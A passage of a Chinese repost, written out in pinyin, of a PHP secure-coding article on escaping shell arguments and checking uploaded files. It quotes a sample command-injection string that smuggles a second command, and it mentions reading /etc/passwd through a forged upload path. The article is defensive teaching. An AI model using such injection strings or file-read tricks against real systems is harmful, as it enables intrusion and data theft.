gong ji ,PHP ti gong le liang ge han shu ,escapeshellarg() he escapeshellcmd()。 escapeshellarg() han shu shi wei le cong yong zuo xi tong ming ling de shen shu de yong hu shu ru ( zai wo men de li zi zhong , shi zip ming ling ) zhong yi chu han you qian zai wei xian de zi fu er she ji de 。 zhe ge han shu de yu fa ru xia : escapeshellarg($string) $string suo zai chu shi yong yu guo lv de shu ru , fan hui zhi shi guo lv hou de zi fu 。 zhi xing shi , zhe ge han shu jiang zai zi fu liang bian tian jia dan yin hao , bing zhuan yi yuan lai zi fu chuan zhong de dan yin hao ( zai qi qian bian jia shang )。 zai wo men de li cheng zhong , ru guo wo men zai zhi xing xi tong ming ling zhi qian jia shang zhe xie xing : $cmp_name = escapeshellarg($cmp_name); $tmp_name = escapeshellarg($tmp_name); wo men jiu neng tong guo que bao chuan di gei xi tong tiao yong de shen shu yi jing chu li , shi yi ge mei you qi ta yi tu de yong hu shu ru , yi gui bi zhe yang de an quan feng xian 。 escapeshellcmd() he escapeshellarg() lei si , zhi shi ta zhi zhuan yi dui di ceng cao zuo xi tong you te shu yi yi de zi fu 。 he escapeshellarg() bu tong ,escapeshellcmd() bu hui chu li nei rong zhong de kong bai ge 。 ju ge shi li , dang shi yong escapeshellcmd() zhuan yi shi , zi fu $string = "'hello, world!';evilcommand" jiang bian wei : 'hello, world';evilcommand ru guo zhe ge zi fu chuan yong zuo xi tong tiao yong de shen shu ta jiang reng ran bu neng de dao zheng que de jie guo , yin wei shell jiang hui ba ta fen bie jie shi wei liang ge fen li de shen shu : 'hello he world';evilcommand。 ru guo yong hu shu ru yong yu xi tong tiao yong de shen shu lie biao bu fen ,escapeshellarg() shi yi ge geng hao de xuan ze 。 bao hu shang chuan de wen jian zai zheng pian wen zhang zhong , wo yi zhi zhi zhe chong jiang xi tong tiao yong ru he bei e yi yong hu jie chi yi chan sheng wo men bu xi wang jie guo 。 dan shi , zhe li huan you ling wai yi ge qian zai de an quan feng xian zhi de ti dao 。 zai kan dao wo men de li cheng , ba ni de zhu yi li ji zhong zai xia bian de xing shang : $tmp_name = $_FILES['file']['tmp_name']; $cmp_name = dirname($_FILES['file']['tmp_name']) . "/{$_FILES['file']['name']}.zip"; $filename = basename($cmp_name); if (file_exists($tmp_name)) { shang bian pian duan zhong de dai ma xing dao zhi de yi ge qian zai an quan feng xian shi , zui hou yi xing wo men pan duan shang chuan de wen jian shi fou shi ji cun zai ( yi lin shi wen jian ming $tmp_name cun zai )。 zhe ge an quan feng xian bing bu lai zi yu PHP zi shen , er zai yu bao cun zai $tmp_name zhong de wen jian ming shi ji shang gen ben bu shi yi ge wen jian , er shi zhi xiang e yi yong hu xi wang fang wen de wen jian , bi ru ,/etc/passwd。 wei le fang zhi zhe yang de qing kuang fa sheng ,PHP ti gong le is_uploaded_file() han shu , ta he file_exists() yi yang , dan shi ta huan ti gong wen jian shi fou zhen de cong ke hu ji shang shang chuan de jian cha 。 zai jue da duo shu qing kuang xia , ni jiang xu yao yi dong shang chuan de wen jian ,PHP ti gong le move_uploaded_file() han shu , lai pei he is_uploaded_file()。 zhe ge han shu he rename() yi yang yong yu yi dong wen jian , zhi shi ta hui zai zhi xing qian zi dong jian cha yi que bao bei yi dong de wen jian shi shang chuan de wen jian 。move_uploaded_file() de yu fa ru xia : move_uploaded_file($filename, $destination); zai zhi xing shi , han shu jiang yi dong shang chuan wen jian $filename dao mu de di $destination bing fan hui yi ge bu er zhi lai biao zhi cao zuo shi fou cheng gong 。 zhu : John Coggeshall shi yi wei PHP gu wen he zuo zhe 。 cong ta kai shi wei PHP bu mian yi jing 5 nian zuo you le 。 ying wen yuan wen :[url=http://www.onlamp.com/pub/a/php/2003/08/28/php_foundations.html]http://www.onlamp.com/pub/a/php/2003/08/28/php_foundations.html[/url]
󰈣󰈤
  免责声明:本文仅代表作者个人观点,与王朝网络无关。王朝网络登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述,其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
 
 
华丽的模特拍摄(8)
华丽的模特拍摄(7)
华丽的模特拍摄(6)
华丽的模特拍摄(5)
八里沟
朝阳宫
天下峨眉 云上金顶
老家(四)
 
>>返回首页<<
 
 
 为你推荐
 
 
 
 转载本文
 UBB代码 HTML代码
复制到剪贴板...
 
 热帖排行
 
 
 
 
 
©2005- 王朝网络 版权所有